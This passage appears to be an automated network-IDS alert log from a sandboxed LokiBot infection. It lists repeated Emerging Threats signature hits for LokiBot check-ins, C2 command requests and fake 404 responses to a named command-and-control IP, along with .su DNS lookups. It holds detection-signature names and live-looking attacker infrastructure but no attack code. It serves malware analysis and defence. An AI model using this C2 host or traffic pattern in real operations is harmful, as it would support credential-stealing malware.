Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856569532014169 11/24/22-19:55:23.105213
SID:	2014169
Source Port:	56569
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249719802825766 11/24/22-19:54:53.033944
SID:	2825766
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249732802825766 11/24/22-19:55:21.169470
SID:	2825766
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853943532014169 11/24/22-19:55:03.645658
SID:	2014169
Source Port:	53943
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249755802025381 11/24/22-19:56:06.881877
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855629532014169 11/24/22-19:55:19.049102
SID:	2014169
Source Port:	55629
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497312025483 11/24/22-19:55:20.867899
SID:	2025483
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249755802825766 11/24/22-19:56:06.881877
SID:	2825766
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249701802024313 11/24/22-19:54:22.087876
SID:	2024313
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249732802025381 11/24/22-19:55:21.169470
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860130532014169 11/24/22-19:55:57.225226
SID:	2014169
Source Port:	60130
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249718802024313 11/24/22-19:54:50.807735
SID:	2024313
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249701802024318 11/24/22-19:54:22.087876
SID:	2024318
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249699802024318 11/24/22-19:54:15.956073
SID:	2024318
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497402025483 11/24/22-19:55:39.709470
SID:	2025483
Source Port:	80
Destination Port:	49740
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497422025483 11/24/22-19:55:42.590814
SID:	2025483
Source Port:	80
Destination Port:	49742
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249718802024318 11/24/22-19:54:50.807735
SID:	2024318
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249699802024313 11/24/22-19:54:15.956073
SID:	2024313
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249702802025381 11/24/22-19:54:25.054966
SID:	2025381
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861609532014169 11/24/22-19:54:59.613442
SID:	2014169
Source Port:	61609
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497282025483 11/24/22-19:55:13.560423
SID:	2025483
Source Port:	80
Destination Port:	49728
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249710802021641 11/24/22-19:54:35.914327
SID:	2021641
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249716802024318 11/24/22-19:54:48.704817
SID:	2024318
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862958532014169 11/24/22-19:55:40.875534
SID:	2014169
Source Port:	62958
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864382532014169 11/24/22-19:54:15.835585
SID:	2014169
Source Port:	64382
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249716802024313 11/24/22-19:54:48.704817
SID:	2024313
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249707802021641 11/24/22-19:54:31.276699
SID:	2021641
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249739802825766 11/24/22-19:55:35.259290
SID:	2825766
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497242025483 11/24/22-19:55:05.403255
SID:	2025483
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849232532014169 11/24/22-19:55:31.114753
SID:	2014169
Source Port:	49232
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862848532014169 11/24/22-19:55:44.925533
SID:	2014169
Source Port:	62848
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249713802021641 11/24/22-19:54:43.021097
SID:	2021641
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249745802825766 11/24/22-19:55:47.082758
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249731802024318 11/24/22-19:55:19.158567
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249706802825766 11/24/22-19:54:29.062049
SID:	2825766
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249749802024313 11/24/22-19:55:55.139215
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249709802825766 11/24/22-19:54:33.518227
SID:	2825766
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249731802024313 11/24/22-19:55:19.158567
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249746802024313 11/24/22-19:55:49.078874
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249742802825766 11/24/22-19:55:40.973542
SID:	2825766
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249749802024318 11/24/22-19:55:55.139215
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497072025483 11/24/22-19:54:33.040572
SID:	2025483
Source Port:	80
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249712802825766 11/24/22-19:54:40.926341
SID:	2825766
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249752802024313 11/24/22-19:56:01.434635
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249746802024318 11/24/22-19:55:49.078874
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249752802024318 11/24/22-19:56:01.434635
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249728802021641 11/24/22-19:55:11.780324
SID:	2021641
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249743802021641 11/24/22-19:55:42.875605
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249738802024313 11/24/22-19:55:33.192742
SID:	2024313
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862910532014169 11/24/22-19:54:44.985895
SID:	2014169
Source Port:	62910
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249724802025381 11/24/22-19:55:03.741584
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249738802024318 11/24/22-19:55:33.192742
SID:	2024318
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249740802825766 11/24/22-19:55:37.776321
SID:	2825766
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249744802024313 11/24/22-19:55:45.028740
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249697802825766 11/24/22-19:54:11.348011
SID:	2825766
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856331532014169 11/24/22-19:54:31.195563
SID:	2014169
Source Port:	56331
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849448532014169 11/24/22-19:54:35.800639
SID:	2014169
Source Port:	49448
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249744802024318 11/24/22-19:55:45.028740
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856750532014169 11/24/22-19:56:03.361289
SID:	2014169
Source Port:	56750
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850506532014169 11/24/22-19:54:33.429766
SID:	2014169
Source Port:	50506
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859752532014169 11/24/22-19:55:35.135406
SID:	2014169
Source Port:	59752
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249721802021641 11/24/22-19:54:56.896268
SID:	2021641
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249729802025381 11/24/22-19:55:13.852615
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249698802025381 11/24/22-19:54:13.981663
SID:	2025381
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249730802025381 11/24/22-19:55:16.067382
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862732532014169 11/24/22-19:55:59.286288
SID:	2014169
Source Port:	62732
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859336532014169 11/24/22-19:56:04.733170
SID:	2014169
Source Port:	59336
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249734802825766 11/24/22-19:55:25.189583
SID:	2825766
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.865198532014169 11/24/22-19:54:42.928676
SID:	2014169
Source Port:	65198
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249735802025381 11/24/22-19:55:27.170416
SID:	2025381
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497542025483 11/24/22-19:56:06.628427
SID:	2025483
Source Port:	80
Destination Port:	49754
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249715802021641 11/24/22-19:54:47.405096
SID:	2021641
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497192025483 11/24/22-19:54:54.654090
SID:	2025483
Source Port:	80
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497522025483 11/24/22-19:56:03.175717
SID:	2025483
Source Port:	80
Destination Port:	49752
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249753802825766 11/24/22-19:56:03.443038
SID:	2825766
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851321532014169 11/24/22-19:55:51.025349
SID:	2014169
Source Port:	51321
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249697802025381 11/24/22-19:54:11.348011
SID:	2025381
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249707802825766 11/24/22-19:54:31.276699
SID:	2825766
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249744802825766 11/24/22-19:55:45.028740
SID:	2825766
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249749802025381 11/24/22-19:55:55.139215
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497162025483 11/24/22-19:54:50.512832
SID:	2025483
Source Port:	80
Destination Port:	49716
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497142025483 11/24/22-19:54:46.656019
SID:	2025483
Source Port:	80
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249754802021641 11/24/22-19:56:04.818902
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249705802024318 11/24/22-19:54:27.228813
SID:	2024318
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249710802025381 11/24/22-19:54:35.914327
SID:	2025381
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497112025483 11/24/22-19:54:39.580169
SID:	2025483
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497132025483 11/24/22-19:54:44.610304
SID:	2025483
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249735802825766 11/24/22-19:55:27.170416
SID:	2825766
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249752802025381 11/24/22-19:56:01.434635
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862766532014169 11/24/22-19:55:55.046216
SID:	2014169
Source Port:	62766
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249705802024313 11/24/22-19:54:27.228813
SID:	2024313
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249710802825766 11/24/22-19:54:35.914327
SID:	2825766
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249707802025381 11/24/22-19:54:31.276699
SID:	2025381
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864601532014169 11/24/22-19:54:24.912578
SID:	2014169
Source Port:	64601
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249706802024313 11/24/22-19:54:29.062049
SID:	2024313
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249735802021641 11/24/22-19:55:27.170416
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249706802024318 11/24/22-19:54:29.062049
SID:	2024318
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852481532014169 11/24/22-19:55:01.607307
SID:	2014169
Source Port:	52481
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249726802825766 11/24/22-19:55:07.738200
SID:	2825766
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249754802825766 11/24/22-19:56:04.818902
SID:	2825766
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

